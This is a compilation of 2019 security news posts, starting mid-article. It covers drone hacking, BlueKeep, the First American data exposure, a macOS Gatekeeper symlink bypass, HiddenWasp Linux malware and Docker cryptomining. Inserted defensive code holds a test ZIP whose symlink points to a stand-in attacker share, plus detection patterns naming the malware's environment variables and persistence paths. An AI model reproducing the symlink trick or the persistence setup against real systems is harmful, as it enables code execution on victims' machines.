But technology like this can equally be used for good and bad purposes and could easily turn into a sci-fi nightmare. And one of the biggest concerns here is that drones can be hacked, or other drones can be used to hack electronic devices and gather data without one’s consent. 

The malicious uses of drones 

Drones can become a threat to your privacy since they can be used as spying devices. 

Numerous cases have been reported so far. To name a few, a couple flew a drone to watch their neighbors and ended up being arrested, and burglars are now reportedly using drones to scout houses they intend to rob.  

Privacy-related incidents may be so common because many countries don’t have any drone laws in place, or drone users are simply unaware of them. But some countries have released regulations. For example, the UK is currently in the process of updating its Drones Bill, most probably as a response to the famous Gatwick Airport incident, when drone sightings stopped 1,000 flights from December 19-21, 2018 and affected the travel plans of around 140,000 people. The United States has also released regulations for drone users, and you can go through them here if you are flying your drones in the US.

Some drones can even see through walls by employing Wi-Fi and 3D imaging, and could easily create 3D plans of buildings that would facilitate criminals’ access inside them.

Not only that, other prominent issues relate to cyber-attacks that may have seemed impossible in the past but can now be carried out using drone technology. Drones can now be used to hack servers, spy on networks, extract data, and block communications.

Corporate networks can be heavily affected by the malicious use of drones, so companies need to have solid security measures in place to prevent unwanted access and protect themselves from cyber warfare attacks. 

How hackers steal data with drones

Attackers can attach a small computer (such as Raspberry Pi) to a drone, fly it over places where they wouldn’t normally be able or allowed to enter, and then exploit Wi-Fi, Bluetooth, or RFID (Radio-frequency identification) vulnerabilities. 

A cybersecurity company proved that a drone could be connected to almost any device, such as a smartphone or laptop, during the 2014 Black Hat security conference in Singapore. They used a drone to intercept data from the attendees’ phones with software dubbed Snoopy that ran on the minicomputer attached to the drone. It could mimic Wi-Fi networks that victims had connected to in the past, after which the researchers were able to steal any information used on the device, including bank details and passwords.

Also, other sources have shown that drones equipped with a radio transceiver could be used to hijack Bluetooth mice. This means that any other Bluetooth-connected devices could be accessed, such as keyboards, from which attackers could obtain keystrokes and figure out users’ login credentials. 

Your own drone could be hacked easily 

Imagine you are flying your drone, planning to take breathtaking shots of the spectacular location you are exploring and all of a sudden, the drone crashes and hits the ground. Or worse, it starts flying into random people and injures them.  

One way this could happen is through GPS spoofing. This practice involves tricking a GPS receiver by transmitting a fake GPS signal. As a result, the drone will use the wrong location.  

How malicious drones can be stopped  

The anti-drone market is expected to reach $1.85 billion by 2024, which shows that significant efforts are being made to fight hostile drones.

For instance, researchers funded by the EU are trying to find ways to detect and disable malicious drones through the KNOX project. Additionally, a recent study conducted by Fujitsu System Integration Laboratories and the Ben-Gurion University of the Negev addresses the same issue and analyzes methods to detect drones. What’s more, companies AT&T and Dedrone (a drone detection technology start-up) are collaborating to develop IoT solutions against malicious drones.  

Below I’ve included a few methods used to detect rogue drones:

1. Geofencing

Geofences are virtual boundaries set up within physical locations where drones can be detected when they reach certain delimited areas.  

How does geofencing work?

This is a location-based service and can be set up using GPS, Wi-Fi, Bluetooth, cellular data or RFID. In order to use geofencing, a developer or admin must create a virtual border around a specified location in GPS- or RFID-enabled software. It’s quite a simple operation and can be represented, for example, by a circle drawn around a location on Google Maps. Technically, the geofence should generate a response the moment an unauthorized drone enters the defined area.

However, this technology may not always be so effective

Regular drones have built-in geofencing software, so you can’t unknowingly fly them over restricted areas, but malicious actors could build their own devices without this software or even hack the standard ones. Apparently, there is a website (on the open internet, not on the dark web) that sells hacks for drones manufactured by DJI, the market leader in unmanned aerial vehicles. The hackers’ solutions remove geofencing, altitude, and speed limitations.

2. Radar 

Radar is already the standard go-to mechanism for aerial vehicle detection, so drones can also be detected using radar detection systems.

Drone radars use a combination of noise detection, thermal detection, radio signal detection, and signal identification. However, this method is not fully accurate, as it can easily mistake birds for drones. 

Additionally, some drone radars also use microphones to recognize noise patterns, but this has proved to be ineffective in noisy urban areas. 

3. Acoustic sensors 

These sensors are able to detect drones that sometimes can’t be seen by radars.  

Acoustic sensors recognize the unique sounds generated by different drone types and run them against a sound signatures database. If there’s a match, the system triggers an alert.  


4. RF Scanners 

Radio-frequency scanners examine the electromagnetic spectrum and find the specific transmissions from drones.  

However, RF scanners only work when radio signals are present. Some drones operate without emitting any RF signals and rely only on GPS, so this method will, in some cases, be ineffective.


5. Thermal imaging 

Thermal imaging cameras work by detecting the heat emitted by almost all objects and materials.

So, drone thermal cameras could prove to be powerful tools to detect unwanted UAVs.  

Of course, there are many other methods out there (including hybrids) that are meant to stop malicious drones, which I haven’t mentioned in this article. Here are some more resources I recommend you check out if you want to become an anti-drone expert: 

To Sum Up 

Drones are certainly impacting our daily lives and will, without doubt, make up an important part of the IoT network used in our future smart cities. But sadly, they can be easily misused for malicious purposes. So, a lot of effort should be put into their cybersecurity and using the proper ways to detect and take down the ones which are threatening us.  

What is your opinion on the issues related to drones and cybersecurity? Share your thoughts in the comments section below. 

The post Cybersecurity and Drones – A Rising Threat? appeared first on Heimdal Security Blog.

Microsoft warns for the second time of applying BlueKeep patch

Microsoft issued a new warning for users to update their systems to address the remote code execution vulnerability dubbed BlueKeep.

Microsoft issued a new warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities; because it can be exploited without user interaction, malware could spread in an uncontrolled way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Now Microsoft is again warning companies to patch older versions of Windows to avoid exploitation of the flaw. Security experts fear a new massive attack that could affect millions of computers worldwide that are still running unpatched systems.

The availability of exploit code in the wild poses a severe risk to users. Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Other experts have also announced that they have successfully developed exploits for BlueKeep, including Kaspersky, Check Point, and MalwareTech.

Recently, the popular expert Robert Graham scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan.

“Microsoft is confident that an exploit exists for this vulnerability, and if recent reports are accurate, nearly one million computers connected directly to the internet are still vulnerable to CVE-2019-0708. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise.” reads the advisory published by Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

Even though there has been no sign of attacks exploiting the flaw in the wild, Microsoft recommends updating the vulnerable Windows versions as soon as possible.

“It’s been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we’re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.” concludes the advisory.

“Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.”

Microsoft also pointed out that workstations not connected to the Internet are also exposed to the risk of a hack.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Microsoft warns for the second time of applying BlueKeep patch appeared first on Security Affairs.

NY Investigates Exposure of 885 Million Mortgage Documents

New York regulators are investigating a weakness that exposed 885 million mortgage records at First American Financial Corp. [NYSE:FAF] as the first test of the state’s strict new cybersecurity regulation. That measure, which went into effect in March 2019 and is considered among the toughest in the nation, requires financial companies to regularly audit and report on how they protect sensitive data, and provides for fines in cases where violations were reckless or willful.

On May 24, KrebsOnSecurity broke the news that First American had just fixed a weakness in its Web site that exposed approximately 885 million documents — many of them with Social Security and bank account numbers — going back at least 16 years. No authentication was needed to access the digitized records.

On May 29, The New York Times reported that the inquiry by New York’s Department of Financial Services is likely to be followed by other investigations from regulators and law enforcement.

First American says it has hired a third-party security firm to investigate, and that it shut down external access to the records.

The Times says few people outside the real estate industry are familiar with First American, but millions have entrusted their data to the company when they go to close the deal on buying or selling a new home.

“First American provides title insurance and settlement services for property sales, which typically require buyers to hand over extensive financial records to other parties in their transactions,” wrote Stacy Cowley. “The company is one of the largest insurers in the United States, handling around one in every four transactions, according to the American Land Title Association.”

News also emerged this week that First American is now the target of a class action lawsuit alleging the Fortune 500 mortgage industry giant “failed to implement even rudimentary security measures.”

This Week in Security News: Trickbots and Infected Containers

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how a Trickbot attack hit a school district’s networks and how infected cryptocurrency-mining containers target Docker hosts with exposed APIs.

Read on:

Trickbot Attack Forces Ohio School District to Cancel Classes

A school district in Ohio suspended classes on Monday, May 20, because of a Trickbot attack on its network and computers.


The IoT Attack Surface: Threats and Security Solutions

Part of adopting the IoT is anticipating what else the technology brings to the environments it is being applied to — not least of which are security concerns that can give rise to successful attacks on IoT systems and devices.

Hacker Has Designs on Canva Data, Steals Info Belonging to 139M Users

The graphic design website Canva was hacked in a data theft incident, which exposed usernames, email addresses, encrypted passwords, customer names and more.

CVE-2019-0725: An Analysis of Its Exploitability

A remote code execution vulnerability from May’s Patch Tuesday is particularly hard to ignore: CVE-2019-0725, an RCE vulnerability in Windows Dynamic Host Configuration Protocol (DHCP) Server, which doesn’t require user interaction and affects all versions of Windows Server.

New Mirai Variant Uses Multiple Exploits to Target Routers and Other Devices

Trend Micro discovered a new variant of Mirai that uses a total of 13 different exploits in a single campaign – the first Mirai variant to do so – and has backdoor and distributed denial-of-service (DDoS) capabilities.

First American Hit with Class Action Lawsuit Over Massive Data Exposure

Insurance giant First American Financial is facing a class action lawsuit for negligence after it left more than 885 million sensitive documents dating as far back as 2003 exposed online. 

CVE-2019-11815: A Cautionary Tale About CVSS Scores

At first glance, the details for Linux kernel vulnerability CVE-2019-11815’s score from CVSS seem like a worst-case scenario but assessing a vulnerability’s potential impact goes beyond the attack vector, privileges, and CIA impact of the base score.

Flipboard Says Hackers Stole User Details

Flipboard, a news aggregator service and mobile news app, has started notifying users of a security incident during which hackers had access to internal systems for more than nine months.

Infected Cryptocurrency-Mining Containers Target Docker Hosts With Exposed APIs, Use Shodan to Find Additional Victims

By analyzing the logs and traffic data coming to and from a honeypot, Trend Micro found a container that came from a public and accessible Docker Hub repository named zoolu2 that contained images with the binary of a Monero cryptocurrency miner.

Nearly 1 Million Systems Affected By ‘Wormable’ BlueKeep Vulnerability (CVE-2019-0708)

Almost a million systems are reportedly vulnerable to BlueKeep, a critical vulnerability in remote desktop services, but Microsoft’s Patch Tuesday for May already rolled out patches for BlueKeep and security advisories were released to help users address the vulnerability.

Under GDPR, UK Data Breach Reports Quadruple

The United Kingdom has seen the number of data breach notifications more than quadruple since Europe’s GDPR privacy law went into full force, a result of mandatory reporting driving better visibility.

Were you surprised that a Trickbot attack could cause a school district to cancel classes? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trickbots and Infected Containers appeared first on .

Episode 504 – Tools, Tips and Tricks – Gmail Filtering And Address Manipulation Tricks

This week’s tools, tips and tricks episode covers two tricks to help keep your Gmail spam under control: Gmail filters and address manipulation. Be aware, be safe.

The post Episode 504 – Tools, Tips and Tricks – Gmail Filtering And Address Manipulation Tricks appeared first on Security In Five.

Cybersecurity Jobs Added to Government’s Shortage Occupation List

Cybersecurity engineers and analysts have been identified as being on the Shortage Occupation List (SOL), in the first full review of officially recognized careers where the shortages “are most severe and where the consequences of those shortages are most serious” since February 2013.

According to the UK Government’s Migration Advisory Committee (MAC), “job shortages in roles such as cybersecurity analysts/engineers and IT network engineers” are now recognized, while the “occupation as a whole ranked highly in our shortage indicators and had an above average vacancy rate.”

In the previous partial update, published in 2015, the job “cybersecurity specialist” was added under the section “information technology and communications professionals not elsewhere classified.” Then, the shortage related to “a person with a minimum of five years’ relevant experience and demonstrable experience of having led a team.”

Since the 2015 partial update, while the need for more skilled cybersecurity professionals remains in this list, it now states “there will be no minimum experience requirement as applying an experience caveat could hinder the development of cybersecurity at all levels.”

This change in requirement follows criticism of hiring practices, where five to 10 years’ experience is commonly demanded and cited as a deterrent to new applicants.

In an email to Infosecurity, Ed Williams, director EMEA of SpiderLabs at Trustwave, said: “The security industry is to blame to some degree, there is very much a gatekeeper philosophy, which is starting to be broken down, but not nearly quick enough from my perspective. This industry is so fast paced and exciting, we should be pulling in the brightest and best - these don’t have to come from Computer Science backgrounds.”

The MAC stated the impact of the skills shortage on cybersecurity development, saying that there have been reported delays to “software improvements and features as they do not have the labor or expertise to fulfil demand” and this has led to “an increasing reliance on workers from outside the UK and there is a growing concern surrounding the future skills base for roles within new technical areas.”

The MAC cited “several sources amongst Government and the private sector” who agreed that there is a shortage of digital skills within the UK, evidenced by consistent vacancies in digital occupations, growth in demand for digital skills, and documented deficiencies across the population in terms of digital skills. The MAC also acknowledged that “there is not enough domestic supply of sufficiently skilled labor to fill this demand.”

According to Deloitte’s Digital Disruption Index for 2019, only 18% of respondents believe that UK school leavers and graduates have the right digital skills, while only 25% of digital leaders in the UK believe their workforce has sufficient knowledge and expertise to execute their digital strategy.

In the section 'Digital and IT Occupations,' careers as IT specialist managers, IT project and programme managers, IT business analysts, architects and systems designers, programmers and software development professionals, web design and development professionals and information technology and telecommunications professionals were listed as being in shortage. Cybersecurity careers appeared under section SOC 2139 - information technology and telecommunications professionals. 

The MAC said that “short-term mitigations have helped to fill shortages to some extent, but this has had limited impact as the skills required simply are not available.”

As well as short-term mitigations, the MAC said that long-term strategies also have their limitations; as up-skilling staff “is constrained by the lack of expertise in newer areas such as cybersecurity and secondly, these strategies are yet to mature, and so the scale of their impacts cannot truly be assessed until the future.”

As part of the UK’s Digital Strategy, it stated that “there will be even greater demand for people with specialist digital skills” as the digital economy grows. 

“As we leave the European Union, it will be even more important to ensure that we continue to develop our home-grown talent, up-skill our workforce and develop the specialist digital skills needed to maintain our world leading digital sector,” then Secretary of State for Culture, Media and Sport Karen Bradley MP stated.

She acknowledged then that “a strong pipeline of specialist skills - from coding to cyber” was needed, and initiatives like the NCSC’s CyberFirst have helped build that. However, a more immediate solution is needed until the next generation begins work.

To be placed on the SOL, a job must meet three requirements:

  • Skilled (are the jobs skilled to the required level?)
  • Shortage (is the job in shortage?)
  • Sensible (is it sensible to try to fill those shortages through migration?)

According to the Migration Advisory Committee, being on the SOL conveys certain advantages:

  • Not having to conduct a Resident Labour Market Test (RLMT)
  • Exemption from the £35,000 minimum income threshold for settlement
  • Priority in the event that the cap binds

In the last Cybersecurity Workforce Study from (ISC)2, it claimed that there is a 2.9 million workforce “gap,” with the APAC region suffering the biggest shortfall of 2.14 million, followed by North America (498,000), EMEA (142,000) and Latin America (136,000).

Security expert shows how to bypass macOS Gatekeeper

A security researcher demonstrated how to bypass the Apple macOS Gatekeeper by leveraging trust in network shares.

The Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

Apple’s Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an app to run. In practice, you will not be able to execute code that wasn’t signed by an Apple developer, and you will not be able to run apps that weren’t downloaded from Apple’s store, unless of course the device is jailbroken.

Filippo Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without the user’s explicit permission and without any warning to the victim.

Gatekeeper considers both external drives and network shares to be safe locations, which means that any application in these locations can run without asking for the user’s consent.

The attacker would need to leverage two legitimate features implemented in macOS, the automount (aka autofs) and the lack of specific checks.

“As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows any application they contain to run.” wrote the expert. “By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behaviour.”

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/

The second feature that was exploited is the ability to include within ZIP archives symbolic links pointing to arbitrary locations, in this case automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. In the attack scenario, the victim downloads the archive and follows the symlink, and is thereby redirected to a location that is controlled by the attacker but also trusted by Gatekeeper.

“To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/ and sends it to the victim. The victim downloads the malicious archive, extracts it and follows the symlink.” continues the expert.

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot.”

Below is a video PoC of the attack:

As a workaround, the expert suggests disabling the automount feature with the following procedure:

  1. Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot
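Two defender-side checks for the technique described above, as an added example (not Cavallarin's PoC or Apple code): an archive scanner that flags symbolic-link entries whose target lands under the /net/ automount path, and a check of /etc/auto_master contents that tells you whether the workaround has actually been applied. The archive and the auto_master text are constructed in memory, and the host name in the link target is hypothetical.

```python
"""Defender-side checks for the Gatekeeper/automount symlink technique.

Added example, not Cavallarin's PoC or Apple code.  Two checks:
  1. scan a ZIP archive for symbolic-link entries whose target lands under an
     automount path such as /net/ (the archive below is constructed in memory);
  2. decide from the text of /etc/auto_master whether the /net automount map
     is still active (the sample contents are constructed, modelled on the
     default macOS file).
"""
import io
import stat
import zipfile

# autofs maps /net by default; extend this if other automount maps are in use
AUTOMOUNT_PREFIXES = ("/net/",)


def suspicious_symlinks(zip_bytes):
    """Return (entry name, link target) for symlink entries pointing at an automount path."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Unix mode bits live in the high 16 bits of external_attr
            mode = info.external_attr >> 16
            if not stat.S_ISLNK(mode):
                continue
            # for a symlink entry the stored body is the link target
            target = zf.read(info).decode("utf-8", "replace")
            if target.startswith(AUTOMOUNT_PREFIXES):
                hits.append((info.filename, target))
    return hits


def build_sample_archive():
    """Constructed test fixture mirroring the page's 'Documents -> /net/...' layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "harmless file")
        link = zipfile.ZipInfo("Documents")
        link.external_attr = (stat.S_IFLNK | 0o755) << 16
        zf.writestr(link, "/net/attacker.example/share")  # hypothetical host
    return buf.getvalue()


def net_automount_enabled(auto_master_text):
    """True if an uncommented line in auto_master maps /net (the workaround comments it out)."""
    for line in auto_master_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.split()[0] == "/net":
            return True
    return False


# Constructed sample, modelled on the default macOS /etc/auto_master
SAMPLE_AUTO_MASTER_BEFORE = """\
#
# Automounter master map
#
+auto_master      # Use directory service
/net              -hosts     -nobrowse,hidefromfinder,nosuid
/home             auto_home  -nobrowse,hidefromfinder
/Network/Servers  -fstab
/-                -static
"""
# Same file after step 2 of the workaround (the /net line commented out)
SAMPLE_AUTO_MASTER_AFTER = SAMPLE_AUTO_MASTER_BEFORE.replace("\n/net ", "\n#/net ")
```

Run `suspicious_symlinks` over archives at a mail gateway or download proxy to surface this pattern before a user extracts it, and `net_automount_enabled` over each Mac's real /etc/auto_master to verify the workaround fleet-wide.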

Cavallarin reported his findings to Apple on February 22, 2019, and the tech giant was expected to address it by May 15, 2019.

“The vendor has been contacted on February 22nd 2019 and it’s aware of this issue.” concludes the researcher. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Gatekeeper, hacking)

The post Security expert shows how to bypass macOS Gatekeeper appeared first on Security Affairs.

Drone Use on the Rise, Public Safety at Risk


Cybersecurity research firm IOActive has issued a stark warning about the potential, unseen risks surrounding the commercialization of drones – calling for manufacturers to take action.

In July 2018, analysts at Technavio predicted that the commercial drone market would grow by 36% (generating $11.61bn) between 2018 and 2022, but with that growth, IOActive has raised concerns about a range of new risks that could follow.

IOActive claimed that if the commercial market for drones is left unchecked, then we could start to see drones being weaponized, presenting potential hazards and threatening the safety of the public.

As drones become more commercially accessible and their functionality improves, they will also become more affordable, but what so often fails to keep pace when new tech such as this grows in popularity is the set of in-built security features that keep it safe from malicious interference.

IOActive pointed to some key drone security risks that could arise as a result, including how malicious actors could program drones to fly to specific GPS coordinates to launch cyber-attacks on Wi-Fi networks (or other types of wireless networks), or even perform man-in-the-middle attacks and disseminate malware.

What’s more, there is also the real risk of disruption, seen recently in the chaos caused by drone sightings at Gatwick airport, and injury, with the potential for hacked drones to be used to ‘dive-bomb’ pedestrians or impact traffic intersections, IOActive explained. Then there are the privacy issues, IOActive added, highlighting that drones have the capability to take photos and record audio and video in otherwise impossible to reach areas.

“With enough determination anything can be hacked, but the commercialization of the drone market is making it all too easy – and many of the consequences for security, safety and privacy have simply not been thought through,” said Cesar Cerrudo, CTO at IOActive.

“The range of drones is of particular concern as it opens up new areas of vulnerability that many will not have considered.”

Cerrudo urged manufacturers to shoulder their share of the responsibility for the products they are bringing to market to ensure they are as secure as possible.

“The relative speed at which these devices are taking to the sky raises several issues. While the use of drones within the military has been common for many years, those drones have been rigorously tested and built with security in mind – commercial manufacturers do not have the same concerns, they are more focused on getting their product to market than ensuring cybersecurity. This attitude needs to change.”

HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel

Security experts at Intezer have discovered a new Linux malware tracked as ‘HiddenWasp’ that borrows from the Mirai and Azazel malicious codes.

HiddenWasp is a new sophisticated Linux malware still undetected by the majority of anti-virus solutions. According to the experts at Intezer, the malware was involved in targeted attacks.  

“Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.” reads the analysis published by Intezer.

“Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.”

Researchers from Intezer said that most of HiddenWasp’s code is unique; nevertheless, the authors borrowed chunks of code from publicly available open-source malware, such as Mirai and the Azazel rootkit.

Like the Linux variant of the Winnti backdoor recently documented by Chronicle, HiddenWasp is composed of a user-mode rootkit, a Trojan, and a script for the initial deployment. 

The script allows the malware to achieve persistence: it creates a new system user account and updates older variants if the system was already compromised. Then the script downloads a Tar archive that contains the rootkit, the Trojan, and the initial deployment script.

“The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script” continue the experts.

Once the malware components are installed, the main Trojan binary is executed and the rootkit is added to the LD_PRELOAD mechanism. The malicious code also sets up various environment variables, and the script attempts to gain persistence by adding the trojan to /etc/rc.local.

“It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN.” continue the experts. “We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code.”

Researchers also found that the HiddenWasp’s rootkit uses an algorithm similar to the one used by the infamous Mirai.

The rootkit is a user-space based rootkit enforced via LD_PRELOAD mechanism that is delivered in the form of an ET_DYN stripped ELF binary.

Experts linked the Trojan component with ChinaZ’s Elknot malware and other ChinaZ implants, a circumstance that suggests that the author of the HiddenWasp may have integrated some modified versions of the Elknot malware that could have been shared in Chinese hacking forums. 

Some artifacts found by the experts also belong to the Chinese open-source Linux rootkit Adore-ng, likely because systems targeted with HiddenWasp might have been previously compromised with this open-source rootkit.

“Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.” concludes the report.

“Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.”
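A read-only host check for the two persistence mechanisms described above (a user-mode rootkit loaded through LD_PRELOAD and a trojan launched from /etc/rc.local) and for the I_AM_HIDDEN / HIDE_THIS_SHELL variable names. This is an added example, not code from Intezer or the article; every file path in its sample tree is a constructed placeholder, not a real HiddenWasp artifact.

```shell
#!/bin/sh
# Added example: point ROOT at a directory tree ("/" for the live system) and
# list LD_PRELOAD and rc.local persistence indicators. The demo at the bottom
# builds a constructed tree when ROOT is not set by the caller.

# Active entries of /etc/ld.so.preload. The file is normally absent or empty,
# so every library listed here deserves a look.
preload_entries() {
  f="$ROOT/etc/ld.so.preload"
  [ -r "$f" ] && grep -Ev '^[[:space:]]*(#|$)' "$f" || true
}

# Lines in system start-up files that set LD_PRELOAD or use the variable names
# from the write-up, prefixed with the file and line they came from.
env_persistence() {
  for f in "$ROOT/etc/rc.local" "$ROOT/etc/environment" "$ROOT/etc/profile" \
           "$ROOT"/etc/profile.d/*.sh; do
    [ -r "$f" ] || continue
    grep -En 'LD_PRELOAD|I_AM_HIDDEN|HIDE_THIS_SHELL' "$f" | sed "s|^|$f:|"
  done
}

# Commands in /etc/rc.local other than comments, blank lines and the closing
# "exit 0", so a launcher appended by a deployment script stands out.
rc_local_commands() {
  f="$ROOT/etc/rc.local"
  [ -r "$f" ] && grep -Ev '^[[:space:]]*(#|$|exit[[:space:]]+0)' "$f" || true
}

# Total indicator lines across the three checks; 0 means nothing fired.
indicator_count() {
  { preload_entries; env_persistence; rc_local_commands; } | grep -c . || true
}

# Constructed tree with both mechanisms present; prints its path.
sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/etc"
  printf '%s\n' '/usr/lib/PLACEHOLDER-rootkit.so' > "$d/etc/ld.so.preload"
  printf '%s\n' '#!/bin/sh -e' '# constructed sample rc.local' \
    'I_AM_HIDDEN=1 /opt/PLACEHOLDER-trojan &' 'exit 0' > "$d/etc/rc.local"
  printf '%s\n' "$d"
}

# Constructed clean tree (an rc.local that only exits); prints its path.
clean_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/etc"
  printf '%s\n' '#!/bin/sh -e' 'exit 0' > "$d/etc/rc.local"
  printf '%s\n' "$d"
}

# Demo against the constructed tree unless the caller supplied ROOT.
demo=0
if [ -z "${ROOT:-}" ]; then ROOT=$(sample_tree); demo=1; fi
echo "== ld.so.preload entries";        preload_entries
echo "== LD_PRELOAD / variable refs";   env_persistence
echo "== rc.local commands";            rc_local_commands
echo "== indicators: $(indicator_count)"
if [ "$demo" -eq 1 ]; then rm -rf "$ROOT"; fi
```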


Pierluigi Paganini

(SecurityAffairs – HiddenWasp, Linux malware)

The post HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel appeared first on Security Affairs.

Apple Releases Firmware Security Updates for AirPort Base Stations

Apple recently released a series of updates that address several firmware security issues affecting its AirPort base stations. Released on 30 May, the changes fix eight vulnerabilities that apply to the AirPort Extreme and AirPort Time Capsule base stations with 802.11ac. Almost half of these bugs concerned denial-of-service (DoS) attacks. Apple fixed one of these […]… Read More

The post Apple Releases Firmware Security Updates for AirPort Base Stations appeared first on The State of Security.

Compromised Docker Hosts Use Shodan for Cryptocurrency Mining

Researchers have detected a campaign in which compromised Docker hosts use Shodan for carrying out cryptocurrency mining.

Hackers scan for Docker hosts with exposed APIs and use them for cryptocurrency mining, deploying malicious self-propagating Docker images that contain Monero miners and scripts which use Shodan to find further vulnerable targets. Researchers at Trend Micro discovered this campaign after a Docker image containing a Monero (XMR) cryptocurrency miner binary was deployed on one of their honeypots, set up as part of their efforts to monitor malicious activity aimed at containers. Sergiu Gatlan, security/tech reporter at Bleeping Computer, writes: “This type of attack is definitely nothing new seeing that researchers from Imperva discovered a similar campaign abusing the CVE-2019-5736 runc vulnerability to deploy cryptominers during early-March.”

“However, the hackers behind the attacks discovered by Trend Micro now also use scripts designed to scan for more vulnerable machines via Shodan search queries scanning for hosts with the 2375 port open and deploying more infected containers to the new targets after brute-forcing their way,” the Bleeping Computer report further says.

An independent security researcher who goes by the name Caprico and researchers at Alibaba Cloud have also observed this campaign.
A blog post dated May 28, 2019 by the Alibaba Cloud researchers says, “Earlier this month, we detected a mining botnet that deploys malicious Docker containers on victim hosts by exploiting Docker’s remote API unauthorized Access vulnerability. We have named the botnet “Xulu” because it serves as username in the botnet’s mining.”

The blog post further says, “Xulu is not the first botnet case that aims at Docker; yet it differs from other botnets by not scanning other hosts by itself, instead it utilizes OSINT (open-source intelligence) technique and dynamically searches Shodan for lists of possible preys…It also placed its controlling server in the Tor network, which is probably an effort to hide the evil backstage manipulator of the botnet.”

The hackers behind the campaign were using the exposed APIs to execute commands on the Docker hosts; these commands allowed them to manage (start, stop or kill) containers and to create new ones by deploying images from a Docker Hub repository that they control.
The Trend Micro team zeroed in on a Docker Hub repository named zoolu2.

Alfredo Oliveira, Senior Threat Researcher at Trend Micro, writes, “By analyzing the logs and traffic data coming to and from the honeypot, we learned that the container came from a public (and thus accessible) Docker Hub repository named zoolu2. Upon checking and downloading the contents of the repository, we found that it contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining software binaries.”

The Trend Micro blog post further explains, “All the images in the zoolu2 repository contained the binary of a Monero (XMR) cryptocurrency miner. This piqued our interest since we’ve already had experience with containers being deployed as miners. In addition, some of the images contained a Shodan script that lists Docker hosts with exposed APIs, which we surmised was being used to identify suitable targets for further container distribution.”

Docker found and took down the repository containing the infected Docker containers and Shodan too disabled accounts used to access its API. But reports say that one malicious Docker image, which has already been downloaded more than 10,000 times, is still available. There have also been reports that point out that the hackers had used another Docker Hub account to host infected containers. When that account was deactivated, they kept moving the containers to other accounts.

